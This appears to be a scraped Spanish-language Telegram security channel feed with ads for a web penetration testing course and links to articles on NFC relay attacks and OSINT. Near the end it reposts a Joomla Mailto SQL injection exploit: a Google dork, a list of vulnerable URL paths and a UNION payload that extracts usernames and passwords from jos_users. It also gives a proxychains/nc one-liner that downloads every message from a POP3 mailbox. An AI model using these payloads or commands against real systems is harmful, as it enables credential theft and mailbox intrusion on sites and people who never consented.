Forwarded from Sebastian Nicolas
📢 Entrenamiento Web Penetration Tester en Linea !!
📅 03 días [ 06,07,08 de Febrero 2019, 3 horas por día !]
‼️El curso tiene como propósito entrenar a recursos humanos en la evaluación de los controles de seguridad implementados por los equipos de desarrollo, a fin de poder detectar vulnerabilidades que pongan en riesgo la información relacionada a dichas aplicaciones.
Durante el curso, el alumno, será capaz de identificar las tecnologías utilizadas por la aplicación, la lógica de negocio implementada, ejecutar un análisis a conciencia sobre la estructura de la aplicación web y probar los dominios de seguridad en la aplicación.
Dirigido a: Dev, Entusiastas de la seguridad y hacking, Ingenieros en sistemas, área de seguridad de la información, Especialistas TI, Ingenieros de seguridad en centro de datos, desarrolladores Web y empresas que desean actualizar sus conocimientos.
No te quedes fuera, cupo limitado !!
https://tpx.mx/cursos/web-penetration-tester/en-linea
📅 03 días [ 06,07,08 de Febrero 2019, 3 horas por día !]
‼️El curso tiene como propósito entrenar a recursos humanos en la evaluación de los controles de seguridad implementados por los equipos de desarrollo, a fin de poder detectar vulnerabilidades que pongan en riesgo la información relacionada a dichas aplicaciones.
Durante el curso, el alumno, será capaz de identificar las tecnologías utilizadas por la aplicación, la lógica de negocio implementada, ejecutar un análisis a conciencia sobre la estructura de la aplicación web y probar los dominios de seguridad en la aplicación.
Dirigido a: Dev, Entusiastas de la seguridad y hacking, Ingenieros en sistemas, área de seguridad de la información, Especialistas TI, Ingenieros de seguridad en centro de datos, desarrolladores Web y empresas que desean actualizar sus conocimientos.
No te quedes fuera, cupo limitado !!
https://tpx.mx/cursos/web-penetration-tester/en-linea
Feliz año 2019 !! Este año tendremos cursos online !! más conferencias y más CTF !! y más retos #happyHacking
NFC Payments: Relay Attacks with LoRa
https://t.co/w9PtCVRKKv
https://t.co/w9PtCVRKKv
Salvador Mendoza
NFC Payments: Relay Attacks with LoRa
Intro This is a second post relating relay attacks. Initially, I wrote a small introduction to “local” relay against NFC Payments using the RFIDIot library. In this post, we will use th…
Hace un año publicamos una investigación sobre las contraseñas expuestas .. hoy salió nuevo leak .. nótanos un % menos de nueva contraseñas con el leal actual : https://tpx.mx/blog/2017/2017-mas-credenciales-expuestas.html checa este post ;)
tpx Security
2017: El año con más credenciales expuestas - tpx Security
Si bien durante los últimos 3 años el aumento de robo de base de datos a sitios web aumento considerablemente, un factor muy importante son los vectores de ataques con los que se obtienen esta información de forma ilegal, uno de ellos es la inyección de código…
Forwarded from 「Drok3r」
Rastreo de un banco offshore y un servicio web oscuro mediante blockchain: una investigación OSINT
https://medium.com/coinmonks/tracing-an-offshore-bank-and-a-dark-web-service-using-the-blockchain-an-osint-investigation-a1000251c3ec
https://medium.com/coinmonks/tracing-an-offshore-bank-and-a-dark-web-service-using-the-blockchain-an-osint-investigation-a1000251c3ec
Medium
Tracing an offshore bank and a dark web service using the blockchain — an OSINT investigation
A how to guide on analysing dark web sites using an onion crawler and analyse their blockchain relationship of bitcoin transactions
Forwarded from 「Drok3r」
Joomla Mailto Components 1.2.2.2 SQL Injection
# Author [ Discovered By ] :
SQL Injection Exploit
Example SQL Injection Exploit Payload
Example SQL Database Error
# Author [ Discovered By ] :
KingSkrupellos# Google Dorks :
inurl:''/index.php?option=com_mailto''# PacketStormSecurity :
packetstormsecurity.com/files/authors/13968
SQL Injection Exploit
/index.php?option=com_mailto&tmpl=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&type=raw&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=mailto&article=[SQL Injection]&Itemid=1
/index.php?option=com_mailto&tmpl=mailto&article=[ID-NUMBER]&Itemid=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=gantry&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=skyextend-fjt&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=kallyas&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=ca_cloudbase2_j25&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=jf_texturia&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=jsn_boot_pro&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=jm-business-marketing&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=findario1.7&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=beez_20&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=allrounder-j1.6&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=siteground-j16-41&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=nagariknews&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=sarmuni&link=[SQL Injection]
Example SQL Injection Exploit Payload
+and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--
+and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--&Itemid=1
Example SQL Database Error
Strict Standards: Non-static method JLoader::import() should not be called statically in /home/hellfire/public_html/libraries/joomla/import.php on line 29
Strict Standards: Only variables should be assigned by reference in /web/htdocs/www.xxx.it/home/templates/it_thelodge3/component.php on line 12
Strict Standards: Accessing static property JCache::$_handler as non static in /web/htdocs/www.xxx.it/home/old_site_2015/libraries/joomla/cache/cache.php on line 420
Forwarded from ..
One liner para jalar todos los emails de un buzón..
echo "USER auser@mail.server\nPASS password2018\n$(for n in {1..344}; do echo RETR $n; done)" | proxychains nc -vv mail.server.addr 110 | tee -a auser-email.txt